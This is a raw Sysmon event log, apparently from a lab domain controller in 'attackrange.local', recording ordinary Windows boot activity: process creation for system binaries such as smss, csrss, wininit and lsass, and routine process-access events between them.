08:41:05.527{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000729Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:04.137{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000728Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:04.137{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000727Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:04.137{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000726Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:04.121{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000725Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:04.121{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000724Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.840{5D479F2C-169F-5F84-0B00-000000007F01}864868C:\Windows\system32\lsass.exe{5D479F2C-169E-5F84-0100-000000007F01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+4e37c|C:\Windows\system32\lsasrv.dll+56c8f|C:\Windows\system32\lsasrv.dll+620fe|C:\Windows\system32\lsass.exe+2086|C:\Windows\system32\lsass.exe+1e11|C:\Windows\system32\lsass.exe+1551|C:\Windows\system32\lsass.exe+4708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000723Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.746{5D479F2C-169F-5F84-0700-000000007F01}720724C:\Windows\system32\wininit.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1000000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wininit.exe+b9e0|C:\Windows\system32\wininit.exe+94ff|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000722Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.746{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000721Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.746{5D479F2C-169F-5F84-0700-000000007F01}720724C:\Windows\system32\wininit.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000720Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.756{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{5D479F2C-169F-5F84-0700-000000007F01}720C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000719Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.715{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000718Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.715{5D479F2C-169F-5F84-0700-000000007F01}720724C:\Windows\system32\wininit.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+5977|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000717Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.705{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exe10.0.14393.3383 (rs1_release.191125-1816)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=457FD1B4ED8D29816560345AE5BA9B73,SHA256=D99AA02447946EFB935B11D21DF99AFDDA0955A588D6AAC42746DE73E1253956,IMPHASH=264C7CFAFE91682E421A605C58E86E40{5D479F2C-169F-5F84-0700-000000007F01}720C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000716Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.559{5D479F2C-169F-5F84-0600-000000007F01}712716C:\Windows\System32\smss.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000715Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.556{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{5D479F2C-169F-5F84-0600-000000007F01}712C:\Windows\System32\smss.exe- 10341000x8000000000000000714Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.543{5D479F2C-169E-5F84-0200-000000007F01}452464C:\Windows\System32\smss.exe{5D479F2C-169F-5F84-0800-000000007F01}728C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6a54|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000713Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.512{5D479F2C-169F-5F84-0400-000000007F01}640644C:\Windows\System32\smss.exe{5D479F2C-169F-5F84-0700-000000007F01}720C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000712Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.507{5D479F2C-169F-5F84-0700-000000007F01}720C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{5D479F2C-169F-5F84-0400-000000007F01}640C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c 10341000x8000000000000000711Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.496{5D479F2C-169F-5F84-0600-000000007F01}712716C:\Windows\System32\smss.exe{5D479F2C-169F-5F84-0800-000000007F01}728C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000710Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.510{5D479F2C-169F-5F84-0800-000000007F01}728C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{5D479F2C-169F-5F84-0600-000000007F01}712C:\Windows\System32\smss.exe- 10341000x8000000000000000709Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.496{5D479F2C-169E-5F84-0200-000000007F01}452464C:\Windows\System32\smss.exe{5D479F2C-169F-5F84-0600-000000007F01}712C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6a54|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000708Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.496{5D479F2C-169E-5F84-0200-000000007F01}452464C:\Windows\System32\smss.exe{5D479F2C-169F-5F84-0600-000000007F01}712C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000707Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.504{5D479F2C-169F-5F84-0600-000000007F01}712C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000c0 0000007c C:\Windows\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{5D479F2C-169E-5F84-0200-000000007F01}452C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x8000000000000000706Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.496{5D479F2C-169E-5F84-0200-000000007F01}452464C:\Windows\System32\smss.exe{5D479F2C-169F-5F84-0500-000000007F01}648C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6a54|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000705Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.355{5D479F2C-169F-5F84-0400-000000007F01}640644C:\Windows\System32\smss.exe{5D479F2C-169F-5F84-0500-000000007F01}648C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000704Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.367{5D479F2C-169F-5F84-0500-000000007F01}648C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{5D479F2C-169F-5F84-0400-000000007F01}640C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c 10341000x8000000000000000703Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.246{5D479F2C-169E-5F84-0200-000000007F01}452636C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}640C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6a54|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+28761|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000702Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.246{5D479F2C-169E-5F84-0200-000000007F01}452636C:\Windows\System32\smss.exe{00000000-0000-0000-0000-000000000000}640C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000701Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:03.257{5D479F2C-169F-5F84-0400-000000007F01}640C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c C:\Windows\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{5D479F2C-169E-5F84-0200-000000007F01}452C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x8000000000000000700Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:02.652{5D479F2C-169E-5F84-0200-000000007F01}452456C:\Windows\System32\smss.exe{5D479F2C-169E-5F84-0300-000000007F01}592C:\Windows\system32\autochk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\SYSTEM32\ntdll.dll+8c3ce|C:\Windows\SYSTEM32\ntdll.dll+8c179|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+4f84|\SystemRoot\System32\smss.exe+20b6|\SystemRoot\System32\smss.exe+65b2|\SystemRoot\System32\smss.exe+a3bb|\SystemRoot\System32\smss.exe+1652|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+6e87f 154100x8000000000000000699Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:02.647{5D479F2C-169E-5F84-0300-000000007F01}592C:\Windows\System32\autochk.exe10.0.14393.2969 (rs1_release.190503-1820)Auto Check UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationAutoChk.Exe\??\C:\Windows\system32\autochk.exe /q /v *C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=33900CEB40D3ECD3504F1DD287428B49,SHA256=A279FC9CECA961D9040AA69F06A0A78B530E21C788C7D7590E866EFC447E979B,IMPHASH=1BF5E4792E849FE3BCFE23E7C1B21A3F{5D479F2C-169E-5F84-0200-000000007F01}452C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 13241300x8000000000000000698Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2020-10-12 08:41:02.621{5D479F2C-169E-5F84-0100-000000007F01}4SystemHKLM\System\CurrentControlSet\Enum\XENVIF\VEN_XS0001&DEV_NET&REV_0000000B\0\FriendlyNameAWS PV Network Device #0 434400x8000000000000000697Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local2020-10-12 08:41:22.008Started12.04.40 10341000x80000000000000001780Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.965{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B3-5F84-4A00-000000007F01}3780C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001779Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 